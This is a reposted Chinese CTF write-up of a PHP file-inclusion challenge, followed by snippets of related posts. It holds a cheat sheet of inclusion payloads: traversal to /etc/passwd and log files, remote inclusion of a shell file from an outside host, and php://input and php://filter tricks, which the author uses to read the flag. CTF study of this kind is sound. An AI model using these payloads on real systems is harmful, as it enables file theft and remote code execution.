2. 程式人生 > >百度杯 二月場web-include By Assassin [檔案包含漏洞]

百度杯 二月場web-include By Assassin [檔案包含漏洞]

阿新 發佈:2019-02-05

開啟題目連結可以看到

這裡寫圖片描述

這就是典型的檔案包含漏洞(當然題目中也是告訴你了,就是檔案包含漏洞),之前不是很瞭解檔案包含漏洞是什麼,在這裡實現了一下。

大概找了一下,有位大哥小小總結了一下技巧

1.基本的檔案包含漏洞:
code : 
* 包含同路徑下的檔案:
?file=.htaccess
* 路徑遍歷:
?file=../../../../../../../../../var/lib/locate.db
(該檔案非常有趣因為它允許你搜索檔案系統)
* 包含注入PHP程式碼的檔案:
?file=../../../../../../../../../var/log/apache/error.log
(you can find other possible Apache dirs here and
 
 other ways here. Think about all possible logfiles, file uploads, session files etc.)


2.受限的本地檔案包含:
code : 
* 空字元注入(Null Byte Injection):
?file=../../../../../../../../../etc/passwd%00
(需要magic_quotes_gpc=off)
* 列目錄(Null Byte Injection):
?file=../../../../../../../../../var/www/accounts/%00
(僅限BSD, 需要magic_quotes_gpc=off,詳細資訊here)

*路徑截斷(Path Truncation):
?file
 
=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ …
(詳細資訊參見 here 和 here)
* 點號截斷:
?file=../../../../../../../../../etc/passwd……………. …
(僅限Windows, 更多細節參見 here)

3.基本的遠端檔案包含:
code : 
* 包含遠端程式碼(Including Remote Code):
?file=[http|https|ftp]://websec.wordpress.com/shell.txt
(需要 allow_url_fopen=On 和 allow_url_include=On)
* 使用php輸入流(Using PHP stream php://input):
?file
 
=php://input
(specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)
* 使用PHP過濾函式(Using PHP stream php://filter):
?file=php://filter/convert.base64-encode/resource=index.php
(lets you read PHP source because it wont get evaluated in base64. More details here and here)

* Using data URIs:
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
(需要 allow_url_include=On)

* 用於跨站指令碼攻擊(Using XSS):
?file=http://127.0.0.1/path/xss.php?xss=phpcode
(makes sense if firewalled or only whitelisted domains allowed)


4.受限的遠端檔案包含漏洞
code : 
* ?file=http://websec.wordpress.com/shell
* ?file=http://websec.wordpress.com/shell.txt?
* ?file=http://websec.wordpress.com/shell.txt%23
(需要 allow_url_fopen=On 和 allow_url_include=On)

5.靜態遠端檔案包含漏洞:
code : 
* 中間人攻擊(Man In The Middle)
(lame indeed, but often forgotten)

雖然很多我也不是很懂,但是暫且放在這裡以待日後使用!下面繼續實驗!

用firefox下載一個hackbar,用常用的php://input輸入嘗試。原理是include字串可以直接在介面輸出的,當然需要支援allow_url_include=On,不過非常不巧的是這裡正好是開著的

這裡寫圖片描述

然後我們先進行實驗

這裡寫圖片描述

我們看到是可以實現的!但是現在我們不知道檔案有什麼,所以進行一下尋找。然後我們構造可以看到

這裡寫圖片描述

應該就是dle345aae.php這個檔案了,但是我們直接輸入並沒有什麼效果

這裡寫圖片描述

這是怎麼回事???猜測是讀取的時候加了waf,用filter功能就行了!構造

?path=php://filter/convert.base64-encode/resource=dle345aae.php

就會用base64的形勢輸出,然後解密就得到了答案!

(PS:本來想嘗試一下遠端的,但是發現遠端連結開啟選項是關閉的,沒辦法了)
這裡寫圖片描述

相關推薦

二月web-include By Assassin [檔案包含漏洞]

開啟題目連結可以看到 這就是典型的檔案包含漏洞(當然題目中也是告訴你了,就是檔案包含漏洞),之前不是很瞭解檔案包含漏洞是什麼,在這裡實現了一下。 大概找了一下,有位大哥小小總結了一下技巧 1.基本的檔案包含漏洞: code : * 包含同路徑下的

二月ReverseProject的writeup

在看完題解之後學習的一發,然後全部按照自己的writeup再次整理做題,鞏固一發 開啟IDA和OD,希望搜尋到有用的字串(Input the flag的提示資訊),但是發現根本找不到,搜尋strings會找到這個: 根據查到的資料,這24個字元構成了一種編碼方式:base

i春秋-十月-EXEC

進入網站,檢視原始碼,發現是用vim編輯,而抓包沒有有效資訊,加引數也無果。百度查了一下vim能形成什麼檔案。找到答案說,用vim編輯文字xxx.php中途退出,會自動建立一個檔案.xxx.php.swp。然後我們下載這個檔案。 用 vim -r 命令恢復檔案,得到原始碼: <html&g

i春秋-十月-vld

檢視原始碼,有提示,index.php.txt  ,  進入得到文字。 不太看得懂,後來百度,大致就是,flag1=.......&flag2=......&flag3=...... ,傳給index.php. 得到下一步,1chunqiu.zip。下載下來,檢視原始碼

i春秋-十月-fuzzing

1. 開啟連結,提示 show me key,抓包,傳值key=1,GET請求沒有用,而POST請求有返回。 2.將md5值直接拿去解密,得到key=ichunqiu105    OK,進入下一步。 3.得到提示, 拿到x0.txt的原始碼:發現正好是解密函式。 4.

-九月-sql

SQL 收穫 敏感詞的可以用<>, /**/ 來繞過。 sql語句正確的格式。 題目描述: 首先 1=1 被過濾,嘗試 and 發現也被過濾;試試繞過 and -> && or -> || order

[]九月 再見CMS writeup

再見CMS 拿到連結是一個部落格網站,對於這樣的題目: 1. 第一步,肯定是要判斷出cms型別 2. 第二步,查詢該cms曾經出現的漏洞 3. 第三步,然後利用這些漏洞拿到flag. 第一步:判斷cms型別 這是該網站的登入頁面,根

[] 九月第二週 Sqli writeup

這道sql注入題折磨了我相當久,痛哭流涕啊! 拿到題,訪問url: http://90fefcf9ed494886b66499d44a5b4f7466e12887e8b44c96.game.ichunqiu.com/b68a89d1c4a097a9d8631

[] 九月 code writeup

進入題目是這樣的一個連結: http://ae98dec0b0e0439a959838553d507f5876842d29b25c44c0.game.ichunqiu.com/index.php?jpg=hei.jpg。 並且顯示了一張圖片。 檢視頁面原始

i春秋 ”CTF比賽(二月) Misc&&web題解 By Assassin

爆破-1 開啟題目我們直接就看到原始碼,加上註釋如下 <?php include "flag.php"; //包含flag.php這個檔案 $a = @$_REQUEST['hello']; //$a

”CTF比賽 2017 二月(Misc Web)

函數 ext time() info erro 一段 hello span clas 爆破-1: 打開鏈接,是502 我直接在後面加個變量傳參數:?a=1 出了一段代碼 var_dump()函數中,用了$$a,可能用了超全局變量GLOBALS 給hello參數

i春秋 “”CTF比賽 十月 web題 Backdoor

解釋 而不是 tro base href alt backdoor pri eat 0x00: 打開題目,題目中告訴我們這題是文件泄露。 0x01: 通過掃描目錄,發現可以掃到的有3個文件 index.php flag.php robots.txt 但是瀏覽flag.

2017 二月第一週WP

1.禍起北荒 題目: 億萬年前 天子之子華夜,被父神之神末淵上神告知六荒十海之北荒西二旗即將發生一場“百度杯”的諸神之戰 他作為天族的太子必須參與到此次諸神之戰定六荒十海 華夜臨危受命,馬上帶著火鳳凰飛行到北荒“西二旗” 卻沒想到這六荒之首北荒西二旗果然名不虛傳,這是一個位於六層虛數空間上的時空大陸 他需要

”CTF比賽 九月_YeserCMS

AD query live username 發現 data tps 報錯 註入 題目在i春秋ctf大本營 題目的提示並沒有什麽卵用,打開鏈接發現其實是easycms,百度可以查到許多通用漏洞 這裏我利用的是無限報錯註入 訪問url/celive/live/header

”CTF比賽 九月_123(文件備份,爆破,上傳)

lag 註釋 alt png 一個 頁面 圖片 比賽 src 題目在i春秋ctf訓練營 翻看源碼,發現提示: 打開user.php,頁面一片空白,參考大佬的博客才知道可能會存在user.php.bak的備份文件,下載該文件可以得到用戶名列表 拿去burp爆破:

”CTF比賽 九月_Test(海洋cms前臺getshell)

OS 技術分享 href 連接 post ive s/4 九月 hive 題目在i春秋ctf訓練營 又是一道cms的通用漏洞的題,直接去百度查看通用漏洞 這裏我使用的是以下這個漏洞: 海洋CMS V6.28代碼執行0day 按照給出的payload,直接訪問url+/sea

”CTF比賽 十月_Login

array flag -s mysql base ssi ech ken pan 題目在i春秋ctf大本營 打開頁面是兩個登錄框,首先判斷是不是註入 嘗試了各種語句後,發現登錄界面似乎並不存在註入 查看網頁源代碼,給出了一個賬號 用帳密登陸後,跳轉到到member.php

2018小訓—“”CTF比賽_九月_SQLi

sci ase dex https lock concat 圖片 數據庫 ack 題目源:  i春秋CTF大本營 小工具:  Burp Suite(抓包神器) 思路點用黃色加粗標記,操作點用綠色加粗標記 解題的流程:     1.點進去一片空白習慣性,看源碼。<!--

i春秋——“”CTF比賽 十月——Login

cat dex this HERE session wake ima base64 query 根據頁面源碼提示的 test1 test1 登錄 刷新此頁面並抓包,有個show=0值得關註 在發送的包的header中加一句show:1,即可得到member.ph

i春秋——“”CTF比賽 九月——123(Apache解析pht,phtml,php3等 php別名)

正則 並不是 src 內容 img 直接 ctf inf bubuko 網頁源碼提示用戶信息在user.php中,直接訪問是不會有顯示的,於是查找相應的備份文件,vim交換文件等,最後發現/user.php.bak 用burp采用如下配置開始爆破 最後爆破